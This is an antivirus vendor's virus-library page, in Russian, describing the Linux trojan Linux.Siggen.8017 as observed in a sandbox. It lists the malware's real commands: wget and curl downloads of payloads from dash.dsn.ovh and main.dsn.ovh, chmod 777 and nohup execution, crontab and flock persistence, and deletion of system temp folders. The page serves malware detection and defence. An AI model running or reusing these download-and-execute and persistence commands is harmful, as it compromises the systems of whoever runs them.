ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

RU
RU CN DE EN ES FR IT JP KZ UZ PL BY
Закрыть

Переключение языка сайта

Сервисы
Сканеры
FixIt!
Dr.Web vxCube
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Linux.Siggen.8017

Добавлен в вирусную базу Dr.Web: 2024-08-31

Описание добавлено:

Техническая информация

Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
  • /var/spool/cron/crontabs/root
  • /etc/crontab
Вредоносные функции:
Запускает процессы:
  • wget -nc http://dash.dsn.ovh/dns/sshd -q -P /var/tmp/
  • crontab -l
  • chmod 777 /var/tmp/retrict.sh
  • grep -qxF * * * * * /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27
  • wget -nc http://dash.dsn.ovh/dns/retrict.sh -q -P /var/tmp/
  • rm -rf .pkexec
  • /usr/bin/grep <0xaa>
  • ./sinax
  • wget -nc http://dash.dsn.ovh/dns/incbit -q -P /var/tmp/
  • <0x11>
  • wget -nc http://dash.dsn.ovh/dns/truct.sh -q -P /var/tmp/
  • /bin/sh ./unix.sh
  • rm retrict.sh
  • chmod 777 /tmp/lushput
  • wget -nc http://dash.dsn.ovh/dns/politrict.sh -q -P /var/tmp/
  • crontab -
  • chmod 777 /var/tmp/sinax
  • chmod 777 /var/tmp/incbit
  • grep -qxF 0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c \x27cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json\x27
  • grep -qxF
  • rm truct.sh
  • rm incbit
  • wget -nc http://dash.dsn.ovh/dns/seasbit -q -P /tmp/
  • <0x29>
  • chmod 777 /var/tmp/unix.sh
  • wget -nc http://dash.dsn.ovh/dns/config.json -q -P /var/tmp/
  • nohup ./sshd
  • grep -qxF * * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27 /etc/crontab
  • /bin/sh -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
  • rm -rf lushput systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og tmux-0
  • /bin/sh ./politrict.sh
  • chmod 777 /tmp/seasbit
  • wget -nc http://dash.dsn.ovh/dns/loadbit -q -P /tmp/
  • chmod 777 /tmp/loadbit
  • wget -nc http://dash.dsn.ovh/dns/lushput -q -P /tmp/
  • chmod 777 /var/tmp/truct.sh
  • wget -nc http://dash.dsn.ovh/dns/brict.sh -q -P /var/tmp/
  • rm sinax
  • rm -rf loadbit
  • rm unix.sh
  • /usr/bin/flock -n /var/tmp/vm.lock -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
  • wget -nc http://dash.dsn.ovh/dns/sinax -q -P /var/tmp/
  • chmod 777 /var/tmp/politrict.sh
  • wget -nc http://dash.dsn.ovh/dns/unix.sh -q -P /var/tmp/
  • /bin/sh ./truct.sh
  • rm brict.sh
  • rm politrict.sh
  • /bin/sh ./retrict.sh
  • /bin/sh ./brict.sh
  • /bin/sh ./sshd
  • chmod 777 /var/tmp/sshd
  • chmod 777 /var/tmp/brict.sh
  • crontab -crontab -l
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/spool/cron/crontabs/tmp.MtGTGR
  • /var/tmp/truct.sh
  • /var/spool/cron/crontabs/tmp.LoxhwO
  • /var/tmp/brict.sh
  • /var/spool/cron/crontabs/tmp.oT6mFA
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Удаляет папки:
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og
  • /tmp/tmux-0
Создает или модифицирует файлы:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/tmp/config.json
  • /var/spool/cron/crontabs/tmp.MtGTGR
  • /var/tmp/truct.sh
  • /var/spool/cron/crontabs/tmp.LoxhwO
  • /var/tmp/brict.sh
  • /var/spool/cron/crontabs/tmp.oT6mFA
  • /var/tmp/vm.lock
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Удаляет файлы:
  • /var/tmp/unix.sh
  • /var/tmp/truct.sh
  • /var/tmp/brict.sh
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /var/tmp/sinax
  • /tmp/lushput
  • /tmp/tmux-0/default
  • /tmp/loadbit
Устанавливает блокировку (lock) на файлы:
  • /var/tmp/vm.lock
Изменяет время создания/доступа/модификации файлов:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/tmp/config.json
  • /var/spool/cron/crontabs
  • /var/tmp/truct.sh
  • /var/tmp/brict.sh
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Сетевая активность:
Устанавливает соединение:
  • 8.#.8.8:53
  • 19#.##.43.137:80
DNS ASK:
  • da##.dsn.ovh
Посылает данные следующим серверам:
  • 19#.##.43.137:80
Получает данные от следующих серверов:
  • 19#.##.43.137:80

Рекомендации по лечению

Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру